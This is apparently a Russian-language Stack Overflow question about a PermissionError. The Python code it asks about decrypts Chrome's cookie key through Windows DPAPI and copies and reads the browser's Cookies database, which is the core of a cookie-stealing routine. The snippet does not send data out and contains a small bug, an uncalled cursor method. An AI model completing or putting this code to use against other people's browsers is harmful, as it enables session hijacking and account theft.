# Ошибка Permission denied в коде python

Tags: python, permissions

```
#!/usr/bin/python
# -*- coding: utf-8 -*

import os
import shutil
import base64
import sqlite3
import win32crypt
import re
import Cryptodome
from Cryptodome.Cipher import AES

Chrome_cookies =  os.getenv('LOCALAPPDATA') + r"\Google\Chrome\User Data\Default\Network\Cookies"
Key = os.getenv('LOCALAPPDATA') + r"\Google\Chrome\User Data\Local State"


if os.path.exists(Chrome_cookies) == True:
        with open(Key, 'r') as file:
            matches1 = re.findall(r'"encrypted_key":"(.+?)"', file.read())
            key = base64.b64decode(matches1[0])[5:]
            decryption_key3 = win32crypt.CryptUnprotectData(key, None, None, None, 0)[1]
            shutil.copy2(Chrome_cookies, 'databasecookies.db')
            conn1 = sqlite3.connect('databasecookies.db')
            cursor1 =  conn1.cursor
            cursor1.execute('SELECT * from cookies ')
            show1 = cursor1.fetchall()
```

Ошибка:

```
  with open(src, 'rb') as fsrc, open(dst, 'wb') as fdst:
PermissionError: [Errno 13] Permission denied: 'C:\\Users\\someuser\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Network\\Cookies'
```

Comment: Приведите полный стек-трейс ошибки в вопросе. Сейчас непонятно где вообще ошибка произошла.

Comment: https://stackoverflow.com/questions/41910583/errno-13-permission-denied